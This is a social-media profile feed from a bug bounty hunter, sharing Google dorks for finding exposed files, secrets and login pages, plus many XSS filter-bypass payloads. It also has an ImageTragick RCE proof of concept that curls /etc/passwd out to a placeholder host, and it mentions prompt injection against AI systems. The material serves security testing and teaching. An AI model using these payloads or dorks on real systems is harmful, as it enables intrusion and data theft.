Mike Takahashi Profile Banner
Mike Takahashi Profile
Mike Takahashi

@TakSec

21,681
Followers
545
Following
348
Media
2,315
Statuses

Pentester | Bug Bounty Hunter | AI Whisperer

Palo Alto, CA
Joined May 2012
Don't wanna be here? Send us removal request.
Pinned Tweet
@TakSec
Mike Takahashi
1 year
Google Dorks for Bug Bounty Input your target to generate Google Dork links for easy OSINT recon #bugbountytips
Tweet media one
28
241
676
@TakSec
Mike Takahashi
11 months
Google Dork - all the juicy extensions site:"target[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess
Tweet media one
32
739
3K
@TakSec
Mike Takahashi
1 year
Google Dorks - Cloud Storage: site: "target[.]com" site: "target[.]com" site: "target[.]com" site: "target[.]com" Find buckets and sensitive data #recon #bugbountytips #infosec #seo
Tweet media one
81
779
3K
@TakSec
Mike Takahashi
2 months
Google Dork - API Endpoints ⚙️ site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3 Find juicy API Endpoints for further testing 🎯
Tweet media one
13
356
3K
@TakSec
Mike Takahashi
1 year
Google Dorks - Part 4: site: "target[.]com" site: "target[.]com" site: "target[.]com" site: "target[.]com" Find hidden endpoints and sensitive data #recon #bugbountytips #infosec
Tweet media one
69
636
3K
@TakSec
Mike Takahashi
2 months
Google Dork - Sensitive Docs 📄 ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx intext:“confidential” | intext:“Not for Public Release” | intext:”internal use only” | intext:“do not distribute” Discover internal files 👀
Tweet media one
9
302
3K
@TakSec
Mike Takahashi
11 months
Google Dork I use every time site:target[.]com ext:php
Tweet media one
13
301
2K
@TakSec
Mike Takahashi
6 months
My Top 2 Google Dorks 🐘 PHP ext:php inurl:? site:example[.]com 🤫 Juicy Extensions ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess site:example[.]com
Tweet media one
4
325
1K
@TakSec
Mike Takahashi
2 months
Google Dork - Login Pages 🔑 inurl:login | inurl:signin | intitle:login | intitle:signin | inurl:secure site:example[.]com Find hidden login pages and admin panels 👀
Tweet media one
4
130
1K
@TakSec
Mike Takahashi
11 months
Google Dork - Sensitive Info inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:target[.]com Emails/phone #s /tokens commonly cached directly in Google
Tweet media one
13
295
1K
@TakSec
Mike Takahashi
1 year
Google Dorks - File Storage: site: "example[.]com" site: "example[.]com" site: inurl:"/d/" "example[.]com" Find sensitive data and company accounts #recon #bugbountytips #infosec #seo
Tweet media one
22
247
957
@TakSec
Mike Takahashi
1 year
ChatGPT for bug bounty: 1. Explain JS 2. JS -> Burp Repeater 3. CSRF PoC 4. XSS PoC A thread 🧵👇
29
157
787
@TakSec
Mike Takahashi
10 months
Google Dork - Deep Subdomains site:*.*.*.target[.]com
Tweet media one
5
142
736
@TakSec
Mike Takahashi
1 year
My favorite Google dorks - Part 2: ext:php inurl:%3F site:*.*.*.<domain> filetype:txt Example: site:tesla .com ext:php #bugbountytips #bugbounty #hacking #infosec #cybersecuritytips #recon
Tweet media one
Tweet media two
16
177
733
@TakSec
Mike Takahashi
11 months
Google Dork - XSS parameters inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:target[.]com
Tweet media one
15
153
724
@TakSec
Mike Takahashi
11 months
Google Dork - Open Redirect inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:target[.]com
Tweet media one
4
169
710
@TakSec
Mike Takahashi
1 year
My favorite Google dork flow: 1. Start w/ "site:<domain>" 2. Remove stuff "-www" 3. Keep reading and removing until you get to the fun stuff Example: site:tesla .com -www -shop -share -ir -mfa #bugbountytips #bugbounty #hacking #infosec #cybersecuritytips #recon #bugbountytip
Tweet media one
24
176
697
@TakSec
Mike Takahashi
1 year
Google Dork - Apache Server Status Exposed: site:*/server-status apache Find sensitive GET requests w/ CSRF tokens & API keys. #recon #bugbountytips #infosec #seo #bugbounty #hacking
Tweet media one
17
209
692
@TakSec
Mike Takahashi
1 year
Email Subdomain Takeovers by @AdamJSturge A lot of bug hunters aren't checking for these. High Impact - read emails from their domain #bugbountytips #infosec #recon #hacking
12
243
682
@TakSec
Mike Takahashi
11 months
🪣 AWS S3 Bucket Leaks 🧪 Basic Test 💻 AWS CLI 🔎 Google Dork 🛠️ Tools A thread 🧵👇
Tweet media one
12
173
640
@TakSec
Mike Takahashi
6 months
Google Dork - File Upload 📁 (site:example[.]com | site:example[.]org) & intext:"choose file”
Tweet media one
Tweet media two
6
118
630
@TakSec
Mike Takahashi
1 year
My favorite XSS payloads: '"><img/src/onerror=prompt()> java%26Tab%3bscript:ale%26Tab%3brt() <iframe src=javascript:alert()// <s<script>cript>alert()</s<script>cript> #xss #bypass #bugbountytips #bugbounty #hacking #infosec #cybersecuritytips
Tweet media one
27
165
629
@TakSec
Mike Takahashi
1 year
Google Dork - High % inurl keywords inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php site:example[.]com Find juicy endpoints and sensitive files #bugbountytips
Tweet media one
19
174
616
@TakSec
Mike Takahashi
5 years
XSS filter bypass using stripped </div> tags to obfuscate. Multiple P2 Stored XSS on a private bug bounty program. XSS Payload: <</div>script</div>>alert()<</div>/script</div>> #BugBountyTips #bugbounty #xss @brutelogic
Tweet media one
5
248
607
@TakSec
Mike Takahashi
1 year
Google Dorks - Cloud Storage #2 : site: "example[.]com" site: "example[.]com" site: "example[.]com" Find sensitive data and company assets #recon #bugbountytips #infosec #seo
Tweet media one
10
148
589
@TakSec
Mike Takahashi
1 year
Google Dorks - Part 5 Other search engines: Example: site:tesla[.]com -site:ir.tesla[.]com Find hidden endpoints not on Google #recon #bugbountytips #seo #infosec
Tweet media one
13
124
575
@TakSec
Mike Takahashi
10 months
Google Dork - SSRF inurl:http | inurl:proxy= | inurl:html= | inurl:data= | inurl:resource= inurl:& site:target[.]com
Tweet media one
5
160
568
@TakSec
Mike Takahashi
6 months
Google Dorks - Cloud Storage: site:s3.amazonaws[.]com "target[.]com" site:blob.core[.]windows[.]net "target[.]com" site:googleapis[.]com "target[.]com" site:drive[.]google[.]com "target[.]com" Find buckets and sensitive data
Tweet media one
2
149
527
@TakSec
Mike Takahashi
4 years
XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()// #xss #bugbountytip #bugbountytips #bugbounty #hacking @brutelogic
Tweet media one
7
227
512
@TakSec
Mike Takahashi
10 months
XSS-Bypass Anatomy Final payload after working hours on a bug bounty target w/ both XSS filters & WAF: %0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A
Tweet media one
3
156
502
@TakSec
Mike Takahashi
11 months
Google Dork - Find Everything 1️⃣ site:target[.]com 2️⃣ Remove noise w/ negative search: -site:www[.]target[.]com -inurl:news -ir 3️⃣Keep going until you find everything
Tweet media one
5
131
498
@TakSec
Mike Takahashi
6 months
Google Dork - Open Redirects inurl:(url= | return= | next= | redirect= | redir= | ret= | r2= | page=) inurl:& inurl:http site:example[.]com
Tweet media one
3
125
493
@TakSec
Mike Takahashi
1 year
My favorite Google dorks - Part 3: OR - Include both queries & - Require both queries intext: - Appears in the page Example: (site:site:tesla. com | teslamotors. com) & intext:"choose file” #bugbountytips #bugbounty #hacking #infosec #recon #seo
Tweet media one
11
124
494
@TakSec
Mike Takahashi
10 months
Google Dork - High % inurl keywords inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php site:example[.]com
Tweet media one
2
133
493
@TakSec
Mike Takahashi
1 year
Google Dork - Publicly Disclosed XSS: site: inurl:reports intext:"<target>.com" 1. Bypass previously “fixed” XSS 2. Escalate SSRF w/ unpatched open redirects #recon #xss #bugbountytips #bugbounty #hacking #infosec
Tweet media one
15
134
477
@TakSec
Mike Takahashi
5 months
Google Dork - Bug Bounty Programs 💰 inurl:bounty "reward" "scope" "report" -yeswehack -hackerone -bugcrowd -synack -openbugbounty Find bug bounty programs others don't know about 🕵️‍♂️
Tweet media one
Tweet media two
0
95
478
@TakSec
Mike Takahashi
2 years
My favorite Burp extensions. Many P1s off the back of these. #bugbounty #bugbountytips #hacking #infosec #cybersecuritytips
Tweet media one
7
116
471
@TakSec
Mike Takahashi
1 year
Tips for getting into bug bounty and web pentesting: 1. Don't worry about certs, just hack or build something 2. @PortSwigger Web Security Academy: 3. Hack on a VDP until you get your first vuln 4. Build a tool or web app #bugbountytips #infosec
Tweet media one
10
93
455
@TakSec
Mike Takahashi
2 months
Google Dork - Server Errors ⚡ inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com Spot juicy targets 👀
Tweet media one
3
70
472
@TakSec
Mike Takahashi
1 year
XSS Bypass - slice + external script Payload: <svg onload=eval(location.hash.slice(1))> Put this at the end of the URL: #with (document)body.appendChild(createElement('script')).src='//domain' More from @brutelogic : #xss #bugbountytips #hacking #infosec
Tweet media one
7
160
461
@TakSec
Mike Takahashi
10 months
XSS Bypass - Stripped Tags Look for anything being removed 🔍 <</div>script</div>>alert()<</div>/script</div>> ⏬ <script>alert()</script> Bypass <script> Blacklist 💥
Tweet media one
3
114
456
@TakSec
Mike Takahashi
1 year
My favorite Recon tools 🔥 Findomain - subdomains httpx - port scan Subjack - subdomain takeovers Nuclei - vuln scan anew - only new stuff Slack webhook - notifications #bugbountytips #recon #bugbounty #infosec #cybersecuritytips #hacking
Tweet media one
Tweet media two
16
144
454
@TakSec
Mike Takahashi
1 year
XSS Testing Steps for <a> tags: 1️⃣ <a href= https://example[.]com> ✅ 2️⃣ <a href=aaa:bbb> ✅ 3️⃣ <a href=javascript:bbb> ❌ 4️⃣ <a href=jav%26%23x61%3bscript:alert()> 💥 HTML entity to bypass blacklisted protocols #bugbountytips
Tweet media one
16
133
427
@TakSec
Mike Takahashi
11 months
Common XSS locations 📍 🔍 Search 👤 Username 🔗 Links ✏️ Text Editor A thread 🧵👇
10
103
419
@TakSec
Mike Takahashi
1 year
ChatGPT - XSS Lab: Having trouble learning some vulnerability class? Just have ChatGPT make you a lab! Details in thread 🧵👇
Tweet media one
16
90
412
@TakSec
Mike Takahashi
1 year
Google Dork - RCE Prone Parameters inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example[.]com Find endpoints for RCE testing #bugbountytips
Tweet media one
11
121
402
@TakSec
Mike Takahashi
1 year
Google Dork - API Docs: inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"example[.]com" Uncover hidden API endpoints 🔍 #recon #bugbountytips #infosec #seo
Tweet media one
12
106
398
@TakSec
Mike Takahashi
10 months
XSS Bypass - javascript: URI If you can inject these tags: <a> <iframe> <object> <embed> But, "javascript:" & "data:" are blocked Try these obfuscation techniques: java%00script: java%0Ascript: java&tab;script: Example: <a href="java%0Ascript:al%0Aert()">click</a>
Tweet media one
3
111
397
@TakSec
Mike Takahashi
2 months
Google Dork - High % keywords 🚀 inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com Discover exposed endpoints worth investigating 🕵️‍♂️
Tweet media one
3
88
398
@TakSec
Mike Takahashi
6 months
Google Dork - Error Pages intext:"error" | intext:"exception" | intext:"not found" | intext:"failed" site:example[.]com
Tweet media one
1
81
385
@TakSec
Mike Takahashi
1 year
Prompt Injections Everywhere 🔥 🔍 Basic Prompt Injection 🔓 Prompt Leak 🎯 Prompt Injection XSS 💉 Prompt Injection SQLi A thread 🧵👇
Tweet media one
9
114
378
@TakSec
Mike Takahashi
1 year
Upload Scanner Burp Extension RCE, XXE, XSS 1. Find upload http request 2. Send the request to Upload Scanner #bugbountytips #bugbounty #RCE #cybersecuritytips #infosec #hacking
Tweet media one
Tweet media two
5
87
366
@TakSec
Mike Takahashi
1 year
Google Dork - Find Bug Bounty programs: "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone" -inurl:news -site:*.de Last two bits reduce noise, but you can remove them. #bugbountytips #bugbounty #infosec
Tweet media one
11
123
365
@TakSec
Mike Takahashi
1 year
Google Dork - SQLi prone parameters inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example[.]com Find endpoints for SQLi testing #bugbountytips
Tweet media one
6
98
361
@TakSec
Mike Takahashi
1 year
Google Dork - SSRF Prone Parameters inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example[.]com Find endpoints for SSRF testing #bugbountytips
Tweet media one
12
114
358
@TakSec
Mike Takahashi
1 year
Easy CSRF I see all the time: 1. In Burp, change request method from POST -> GET 2. Remove CSRF token 3. If PoC works against another user, you have CSRF #bugbountytips #bugbounty #infosec #cybersecuritytips #csrf
Tweet media one
11
95
364
@TakSec
Mike Takahashi
5 years
XSS filter bypass: <embed src="javascript%26%63%6f%6c%6f%6e%3balert()"> The url encoded portion is the html entity for colon: : #bugbountytips #bugbounty #XSS
4
132
357
@TakSec
Mike Takahashi
10 months
Google Dork - Bug Bounty Programs "reward" "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"
Tweet media one
5
81
350
@TakSec
Mike Takahashi
1 year
Bypass XSS filters for rich text editors like TinyMCE A thread 🧵👇
24
89
346
@TakSec
Mike Takahashi
1 year
WPScan - Best Flags 🔥 wpscan --url https://example[.]com --api-token <api token> --plugins-detection mixed -e vp,vt,cb,dbe,u1-10 --force A thread 🧵👇
Tweet media one
6
109
348
@TakSec
Mike Takahashi
8 months
XSS Fuzzing w/ ChatGPT Prompt #1 : explain this: javascript:alert() Prompt #2 : show me alternatives Customize Bypass: list 10 that don't use the word "alert" intact
Tweet media one
4
70
345
@TakSec
Mike Takahashi
5 years
XSS on a login page while stuck in an input tag with <> filtered. Final Payload: " formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src="" Also gets around "javascript" and "alert" blacklist with html entity Tab obfuscation. #BugBountyTips #bugbounty #XSS
Tweet media one
1
132
342
@TakSec
Mike Takahashi
1 year
🔎 Google Dork - XSS 🔍 inurl:q= | inurl:?s= | inurl:search= | inurl:query= | inurl:lang= | inurl:keyword= inurl:& site:example[.]com Find common parameters vulnerable to XSS #recon #bugbountytips #infosec #seo
Tweet media one
15
91
340
@TakSec
Mike Takahashi
1 year
Weird IDOR I've never seen before: 1. User 1 updates at /api/account 2. User 2 registers at /api/register 3. Change userID for /api/register from User 2 -> User 1 🤯 IDOR succeeds - User 2 changes account details of User 1 via registration endpoint #bugbountytips #infosec
Tweet media one
12
78
332
@TakSec
Mike Takahashi
1 year
SSRF via PDF Generators 🚀 based on the work of @NahamSec and @barbixxxa A thread 🧵👇
Tweet media one
6
125
333
@TakSec
Mike Takahashi
11 months
Google Dork - XSS & Open Redirects Disclosed site:openbugbounty[.]org inurl:reports intext:"target[.]"
Tweet media one
5
68
335
@TakSec
Mike Takahashi
5 years
Recon to RCE: Google "upload" site:”target" -> upload form -> ImageTragick MVG -> RCE PoC: push graphic-context viewbox 0 0 200 200 fill 'url( https://example.123 "|curl -d "@/etc/passwd" -X POST ")' pop graphic-context #BugBountyTips #bugbounty #RCE
2
152
324
@TakSec
Mike Takahashi
1 year
New blog post: Hack rich text editors for XSS This is the method I use anytime I see a rich text editor embedded in a bug bounty or pentesting target. #xss #bugbountytips #infosec #hacking
4
91
316
@TakSec
Mike Takahashi
11 months
Google Dork - Juicy Endpoints site:target[.]com ext:jsp | ext:asp | ext:aspx | ext:pl | ext:cfm | ext:py | ext:rb
Tweet media one
3
92
311
@TakSec
Mike Takahashi
1 year
Google Dork - Bug Bounty Programs site:*/security.txt "bounty" Find lesser known targets #bugbountytips
Tweet media one
7
73
309
@TakSec
Mike Takahashi
1 year
Blind IDOR 💥 1. Change userID 2. Get 200 status code, but no info leak 3. Check email, SMS, and export files 4. Email notification leaks PII Great write up by @vickieli7 : #idor #BAC #bugbountytips #bugbounty #hacking #infosec #cybersecuritytips
Tweet media one
Tweet media two
2
68
307
@TakSec
Mike Takahashi
1 year
Google Dorks - Extensions: site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess Find sensitive file leaks #bugbountytips #infosec #seo
4
78
303
@TakSec
Mike Takahashi
6 months
Google Dork - XSS parameters inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example[.]com
Tweet media one
2
76
304
@TakSec
Mike Takahashi
1 year
P1 IDORs & BAC w/ Auth Analyzer Burp Extension: 1. Copy/paste session cookies from different users 2. Start Analyzer 3. Do things in browser w/ user 1 4. Look at SAME responses for any requests that user 2 can do that should only be accessible for user 1 #bugbountytips #hacking
Tweet media one
Tweet media two
Tweet media three
Tweet media four
11
114
292
@TakSec
Mike Takahashi
1 year
Google Dorks - Wordpress, Drupal, Joomla inurl:/wp-admin/admin-ajax.php intext:"Powered by" & intext:Drupal & inurl:user site:*/joomla/login #recon #bugbountytips #infosec #seo
Tweet media one
2
80
289
@TakSec
Mike Takahashi
5 months
Google Dork - Unlisted Bug Bounty Programs 🐛 "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone" reward -site:hackerone[.]com Some programs don't want to be listed in the directory; you can only access them directly via their site.
Tweet media one
3
68
280
@TakSec
Mike Takahashi
1 year
Google Dork - LFI Prone Parameters inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example[.]com Find endpoints for LFI testing #bugbountytips
Tweet media one
9
89
271
@TakSec
Mike Takahashi
1 month
Easy Bounty Explained in 🧵 🔍 Google Dork 👀 API endpoint 👾 XSS probe '">< ⚡ Page breaks 🛠️ XSS payload 🚫 Akamai block 🔧 Akamai WAF bypass by @BRuteLogic 💥 XSS alert
Tweet media one
6
53
276
@TakSec
Mike Takahashi
1 year
XSS context to keep 👀 out for - Multiple reflections 2 reflections, 1 input: param = */alert()</script><script>/* 2 reflections, 2 inputs: p1 = <svg/1=' p2 = 'onload=alert()> Credit: @brutelogic More: #xss #bugbountytips #bugbounty #hacking #infosec
Tweet media one
7
101
272
@TakSec
Mike Takahashi
1 year
Github Dorks 1. Slack web hook: " https://hooks.slack[.]com/services/" 2. Slack API token: xoxp OR xoxb 3. Telegram API token: "api_hash" "api_id" 4. shell scripts: language:shell #recon #bugbountytips #infosec
Tweet media one
9
77
269
@TakSec
Mike Takahashi
1 year
Google Dorks - Sharepoint & uncommon S3 domains: site: "example[.]com" site: "example[.]com" site: "example[.]com" Discover elusive buckets & sensitive files #recon #bugbountytips #infosec #seo
Tweet media one
3
64
267
@TakSec
Mike Takahashi
1 year
ChatGPT for Bug Bounty - XXE: 1. Basic XML 2. SVG 3. Excel A thread 🧵👇
9
71
262
@TakSec
Mike Takahashi
6 months
Google Dork - Test Environments inurl:demo | inurl:dev | inurl:staging | inurl:test | inurl:sandbox site:example[.]com
Tweet media one
3
70
269
@TakSec
Mike Takahashi
10 months
Google Dork - All the TLDs site:target.*
Tweet media one
7
45
259
@TakSec
Mike Takahashi
1 year
Google Dorks - OneDrive, Firebase, and JFrog Artifactory: site: "example[.]com" site: "example[.]com" site: "example[.]com" Find sensitive data and company accounts #recon #bugbountytips #infosec #seo
Tweet media one
3
84
259
@TakSec
Mike Takahashi
1 year
GPT-4 XSS payload
Tweet media one
8
27
241
@TakSec
Mike Takahashi
6 months
Google Dork - Old Sites site:example[.]com -inurl:https Unexpected results with this one
Tweet media one
2
43
240
@TakSec
Mike Takahashi
1 year
Easy CSRF and POST XSS PoC: 1. "Generate CSRF PoC" in Burp 2. Copy HTML 3. Paste into Decoder 4. Encode as Base64 and copy output 5. Paste it to the end of this URI: data:text/html;base64,<Base64 here> 6. Open the link to activate CSRF #bugbountytips #csrf #xss #infosec
Tweet media one
5
77
234
@TakSec
Mike Takahashi
1 year
MobSF - Mobile Security Framework 📱🔐 created by @ajinabraham All-in-one mobile pentesting: 🔍Static Analysis 🎯 Dynamic Analysis 🌐 REST API A thread 🧵👇
Tweet media one
10
61
236
@TakSec
Mike Takahashi
1 year
iframe Injection 1. iframes allowed, but only whitelisted domain 2. Find "safe" external redirect or open redirect 3. Payload: <iframe width="560" height="315" src=" https://[whitelisted domain]/?redir= https://taksecPoC/iframexss.html"></iframe> #bugbountytips #hacking #infosec
Tweet media one
3
58
233
@TakSec
Mike Takahashi
1 year
ChatGPT for Bug Bounty - Part 2: 1. Brainstorm 2. Pick BBP 3. Terms 4. Impact 5. Understand Disclosed Report A thread 🧵👇
10
47
223
@TakSec
Mike Takahashi
1 year
🚀 Ready to level up your Burp Suite game? Check out my latest Medium article packed with tips & tricks to supercharge your workflow! From filtering proxy history to must-have extensions, we've got you covered! 🌐🔥 Read & share: #bugbountytips
2
75
218
@TakSec
Mike Takahashi
1 year
XSS via Angular Client-Side Template Injection P2/P3 >=1.6.0 {{constructor.constructor('alert(1)')()}} 1.2.24 - 1.2.29 {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\u002ex)alert(window\u002ex=1)')+eval(y)+\"'");}}}} #bugbountytips #xss #infosec
Tweet media one
1
68
220
@TakSec
Mike Takahashi
10 months
Broken Access Control (BAC) - Basic Test 🧪 1️⃣ Log in to User A 👤🅰️ 2️⃣ Do something sensitive 🤫 3️⃣ Find HTTP request 🔍 4️⃣ Send to Burp Repeater ➡️ 5️⃣ Log in to User B 👤🅱️ 6️⃣ Use B's cookie to repeat A's request 🔄🍪 If it works, 💥 you've got a BAC vulnerability
Tweet media one
7
58
215
@TakSec
Mike Takahashi
1 year
XSS in rails-html-sanitizer < 1.4.4 H1 reports by 0b5cur17y: Deep Dive by 0b5cur17y:
Tweet media one
5
47
202
@TakSec
Mike Takahashi
1 year
Google Dork - Open Redirects: inurl:page= | inurl:url= | inurl:return= | inurl:next= | inurl:redir= | inurl:redirect= | inurl:target= | inurl:page= inurl:& inurl:http site: Find parameters vulnerable to open redirect #recon #bugbountytips #infosec #seo
Tweet media one
20
63
204
@TakSec
Mike Takahashi
1 year
New blog post: ChatGPT for Bug Bounty: Faster Hunting and Reporting Save time, learn technical skills, and write effective reports with AI-powered ChatGPT #bugbountytips #bugbounty #hacking #infosec #chatgpt #ai
8
53
204